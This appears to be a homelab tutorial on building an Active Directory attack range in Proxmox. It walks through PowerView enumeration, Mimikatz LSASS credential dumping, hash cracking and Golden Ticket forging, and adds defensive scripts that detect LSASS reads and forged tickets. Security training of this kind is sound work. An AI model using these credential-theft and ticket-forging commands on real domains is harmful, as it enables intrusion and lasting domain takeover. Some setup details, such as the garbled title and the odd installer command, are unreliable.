The Ultimate Homelab Blueprint: How to Build Your Own Cyber Attack Range for Under 00

Introduction:

Building a professional-grade Active Directory (AD) homelab is no longer a luxury reserved for large corporations; it is an essential, hands-on training ground for cybersecurity professionals. By virtualizing a controlled network environment with domain controllers, servers, and workstations, practitioners can safely emulate, attack, and defend against real-world threats, transforming theoretical knowledge into practical, muscle-memory skill. This guide provides the technical roadmap to construct your own cyber range using Proxmox, enabling deep, foundational learning of AD security that is often overlooked in standardized penetration testing challenges.

Learning Objectives:

  • Design and deploy a fully functional, isolated Active Directory domain for security testing.
  • Master core Windows Server and Linux administration commands essential for configuration and hardening.
  • Execute and mitigate common AD attack vectors, from initial enumeration to full domain compromise.

You Should Know:

1. Virtualization Foundation with Proxmox

The entire homelab is built on Proxmox Virtual Environment (VE), a powerful, open-source server virtualization platform. The first step is installing the hypervisor on your physical hardware.

`wget https://enterprise.proxmox.com/iso/proxmox-ve_8.1-1.iso` – Downloads the Proxmox VE 8.1-1 installation ISO.
`dd if=proxmox-ve_8.1-1.iso of=/dev/sdX bs=4M status=progress && sync` – Creates a bootable USB drive on a Linux system (replace `/dev/sdX` with the USB device; everything on it is overwritten).

After burning the ISO to a USB drive, boot your physical machine from it. The Proxmox installer provides a straightforward graphical interface. Follow the prompts, configuring your disk partitioning, setting a strong root password for the Proxmox web interface, and defining a static IP address for the management interface (e.g., 192.168.1.10/24). Once installed, you will manage your entire lab via the web-based management GUI at `https://[YOUR-IP]:8006`.

2. Core Virtual Machine Creation

With Proxmox operational, the next phase is creating template virtual machines (VMs) for Windows and Linux to be cloned later.

`qm create 9000 --name "win10-template" --memory 4096 --cores 2 --net0 virtio,bridge=vmbr0` – Proxmox CLI command to create a new VM with ID 9000, 4GB RAM, and 2 CPU cores.
`qm set 9000 --ide2 local:iso/win10-iso.iso,media=cdrom` – Attaches a Windows 10 ISO to the VM as a CD-ROM drive (the ISO must already be uploaded to the `local` storage).

Within the Proxmox GUI, complete the OS installation on your template VMs. For Windows, use evaluation copies available from Microsoft. For a Linux machine like a vulnerable web server, use a minimal Ubuntu Server install: `subiquity --automation config.yaml`. After installation, install the `qemu-guest-agent` on Linux (`sudo apt install qemu-guest-agent`) and Windows (via the `virtio-win` driver ISO) to enable proper host-VM communication. Finally, run `sysprep` on Windows or `sudo apt clean && sudo truncate -s 0 /etc/machine-id` on Linux to generalize the image before converting it to a template.

3. Active Directory Domain Services Deployment

The heart of the lab is the Domain Controller (DC). Promote a Windows Server 2022 VM to a DC using PowerShell.

`Install-WindowsFeature -Name AD-Domain-Services -IncludeManagementTools` – Installs the AD DS server role.
`Install-ADDSForest -DomainName "lab.local" -DomainNetbiosName "LAB" -InstallDns:$true -SafeModeAdministratorPassword (ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force) -Force:$true` – Promotes the server to a DC and creates a new forest.

This single command creates the `lab.local` domain. After the mandatory reboot, log in with the domain administrator account. Verify the installation by opening `Active Directory Users and Computers` (dsa.msc) and confirming the built-in containers exist. Configure the DHCP server role on the DC to manage IP addressing for your lab VMs, ensuring they automatically receive DNS settings pointing to the DC to facilitate proper domain joining.

4. Domain Joining and Organizational Unit (OU) Structure

A well-structured AD is crucial for testing. Create OUs and join client machines to the domain.

`Add-Computer -DomainName "lab.local" -Credential LAB\Administrator -Restart -Force` – PowerShell command on a client workstation to join it to the domain.
`New-ADOrganizationalUnit -Name "Servers" -Path "DC=lab,DC=local" -ProtectedFromAccidentalDeletion $false` – Creates a new OU for server objects.

Create a logical OU structure (e.g., Servers, Workstations, Users, Admins) using the `Active Directory Administrative Center` or PowerShell. Use Group Policy Objects (GPOs) linked to these OUs to apply settings per machine class, whether that is a security baseline or a deliberate weakening for an exercise. For example, create a GPO linked to the "Workstations" OU to disable Windows Firewall for testing purposes. This structured environment allows for precise testing of GPO abuse and lateral movement techniques.

5. Essential Enumeration with PowerView

Once the lab is built, begin offensive testing. Reconnaissance is the first step, and PowerView is the classic tool for AD enumeration.

`Get-NetDomain` – Retrieves basic information about the current domain.
`Get-NetUser | Select-Object samaccountname, description, lastlogon` – Enumerates all domain users and key properties.
`Get-NetComputer -OperatingSystem "*Server*" | Select-Object name, operatingsystem` – Finds all computers running a server OS.

Import PowerView into your PowerShell session: `Import-Module .\PowerView.ps1`. These commands help an attacker map the domain structure, identify high-value users (e.g., Domain Admins), and locate potential target servers. Run these from a standard user-context workstation to understand what information is readily available in a default AD configuration, highlighting common information disclosure misconfigurations.

6. Credential Dumping with Mimikatz

Mimikatz is the quintessential tool for extracting credentials from memory, demonstrating the critical attack of credential theft.

`privilege::debug` – Attempts to enable the SeDebugPrivilege, required for accessing other processes’ memory.
`sekurlsa::logonpasswords` – Dumps passwords, hashes, and Kerberos tickets from the Local Security Authority Subsystem Service (LSASS) memory.

On your Windows server, ensure you have appropriate permissions (e.g., Local Administrator rights). Mimikatz will output NTLM password hashes for logged-on users. These hashes can be used for Pass-the-Hash attacks or cracked offline with tools like Hashcat: `hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt`. This exercise underscores the critical importance of credential hygiene and the need for protections like Windows Defender Credential Guard.
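To see the defender's side of this exercise, the following added example (not part of the original post) scans Sysmon Event ID 10 (ProcessAccess) records for processes that open LSASS with memory-read rights. The JSON-lines export format, the sample events, and the allowlisted `LabEDR` agent path are constructed assumptions.

```python
import json

PROCESS_VM_READ = 0x0010  # access right required to read another process's memory
# Hypothetical allowlist: lab tooling that is expected to read LSASS (tune per environment).
ALLOWED_SOURCES = {r"c:\program files\labedr\agent.exe"}

# Constructed Sysmon Event ID 10 records, one JSON object per line (not real telemetry).
SAMPLE_EVENTS = r"""
{"EventID": 10, "Computer": "srv01.lab.local", "SourceImage": "C:\\Program Files\\LabEDR\\agent.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "Computer": "srv01.lab.local", "SourceImage": "C:\\Users\\bob\\Downloads\\tool.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "Computer": "srv01.lab.local", "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 10, "Computer": "ws01.lab.local", "SourceImage": "C:\\Users\\bob\\Downloads\\tool.exe", "TargetImage": "C:\\Windows\\explorer.exe", "GrantedAccess": "0x1fffff"}
{"EventID": 1, "Computer": "ws01.lab.local", "Image": "C:\\Windows\\System32\\cmd.exe"}
"""

def lsass_read_alerts(text, allowed=ALLOWED_SOURCES):
    """Return one alert per non-allowlisted process that opened LSASS with VM_READ."""
    alerts = []
    for line in filter(None, map(str.strip, text.splitlines())):
        try:
            ev = json.loads(line)
            access = int(ev.get("GrantedAccess", "0"), 16)
        except ValueError:
            continue  # skip truncated or malformed lines instead of aborting the run
        if ev.get("EventID") != 10:
            continue  # only ProcessAccess events carry the fields checked below
        source = ev.get("SourceImage", "")
        target = ev.get("TargetImage", "").lower()
        reads_lsass = target.endswith(r"\lsass.exe") and access & PROCESS_VM_READ
        if reads_lsass and source.lower() not in allowed:
            alerts.append({"host": ev.get("Computer"),
                           "source": source,
                           "access": hex(access)})
    return alerts

if __name__ == "__main__":
    for alert in lsass_read_alerts(SAMPLE_EVENTS):
        print(alert)
```

Only the second event is reported: the allowlisted agent is skipped, the `0x1000` handle cannot read memory, and the fourth event does not target LSASS.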

7. Persisting with Golden Tickets

A Golden Ticket attack allows for persistent, stealthy access to the domain by forging Kerberos Ticket-Granting Tickets (TGTs).

`lsadump::lsa /patch` – (In Mimikatz) Extracts the KRBTGT account’s NTLM hash from the DC.
`kerberos::golden /User:GenericUser /domain:lab.local /sid:S-1-5-21-… /krbtgt:KRBTGT_NTLM_HASH /id:500 /ptt` – Forges a Golden Ticket and injects it into the current session.

This attack requires compromise of the KRBTGT account’s password hash, which is why rotating this account’s password twice is the standard remediation after a suspected domain compromise. After running the `kerberos::golden` command, use `dir \\dc.lab.local\c$` to prove that you now have domain administrative access without knowing any administrator passwords, demonstrating the absolute trust placed in the Kerberos protocol and the KRBTGT key.
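A defender-side check for the forged ticket described above, as an added example that is not part of the original post: it parses `klist` output and flags TGTs whose lifetime exceeds the domain maximum or that are RC4-encrypted, which is what a ticket keyed from the KRBTGT NTLM hash carries. The sample output is constructed; the US date format, the 10-hour policy value, and the RC4 label string are assumptions to adjust for your lab.

```python
import re
from datetime import datetime, timedelta
MAX_TGT_LIFETIME = timedelta(hours=10)  # assumed domain policy; match your Kerberos GPO
RC4_LABEL = "RSADSI RC4-HMAC(NT)"       # assumed klist label for RC4-encrypted tickets

# Constructed klist output (US date format), not captured from a real host.
SAMPLE_KLIST = """\
#0>     Client: alice @ LAB.LOCAL
        Server: krbtgt/LAB.LOCAL @ LAB.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 3/4/2025 9:00:00 (local)
        End Time:   3/4/2025 19:00:00 (local)
#1>     Client: GenericUser @ lab.local
        Server: krbtgt/lab.local @ lab.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 3/4/2025 9:05:00 (local)
        End Time:   3/2/2035 9:05:00 (local)
"""
FIELD = re.compile(r"^\s*(?:#\d+>\s*)?([A-Za-z ]+?):\s+(.*?)\s*$")

def parse_klist(text):
    """Split klist output into one dict of fields per cached ticket."""
    tickets = []
    for line in text.splitlines():
        if re.match(r"^#\d+>", line):
            tickets.append({})  # a "#N>" marker starts a new ticket record
        m = FIELD.match(line)
        if m and tickets:
            tickets[-1][m.group(1)] = m.group(2)
    return tickets

def parse_time(value):
    return datetime.strptime(value.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")

def suspicious_tgts(text, max_lifetime=MAX_TGT_LIFETIME):
    """Return (client, reasons) for each TGT that violates lifetime or etype policy."""
    findings = []
    for t in parse_klist(text):
        is_tgt = t.get("Server", "").lower().startswith("krbtgt/")
        if not is_tgt or not {"Start Time", "End Time"} <= t.keys():
            continue  # skip service tickets and incomplete records
        reasons = []
        lifetime = parse_time(t["End Time"]) - parse_time(t["Start Time"])
        if lifetime > max_lifetime:
            reasons.append(f"lifetime {lifetime.days}d exceeds policy")
        if t.get("KerbTicket Encryption Type") == RC4_LABEL:
            reasons.append("RC4-encrypted TGT")
        if reasons:
            findings.append((t.get("Client"), reasons))
    return findings
```

Running `suspicious_tgts(SAMPLE_KLIST)` reports only the `GenericUser` ticket, on both counts; the 10-hour AES ticket for `alice` is within policy.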

What Undercode Say:

  • The hands-on process of building and breaking an AD environment provides irreplaceable, foundational context that drastically accelerates an offensive security learning curve.
  • A homelab is not a one-time project but a living environment for continuous testing, allowing for the safe practice of novel exploits and complex attack chains before they are encountered in professional engagements.

The professional value of a self-built homelab cannot be overstated. While curated penetration testing labs like HackTheBox teach valuable exploitation skills, they often abstract away the underlying misconfigurations and architectural nuances that lead to vulnerability. Building the domain from the ground up forces a defender’s mindset, revealing why certain settings are dangerous and how attackers discover them. This deep, systems-level understanding is what separates competent technicians from expert architects. The ability to quickly revert a compromised network to a known-good state with a Proxmox snapshot encourages aggressive and creative testing, fostering a truly experimental and mastery-oriented learning environment.

Prediction:

The accessibility of powerful, cheap hardware and open-source virtualization software will democratize advanced cybersecurity training, leading to a new generation of practitioners with deeply internalized, systems-level knowledge. This grassroots upskilling will force enterprises to adopt more sophisticated defensive postures as common attack techniques become widely understood. Furthermore, the rise of AI-powered penetration testing tools will be trained and tested within these isolated homelabs first, accelerating their development and refinement before they are integrated into commercial security products, ultimately raising the bar for both attackers and defenders.

Reported By: Noahfarmer When – Hackers Feeds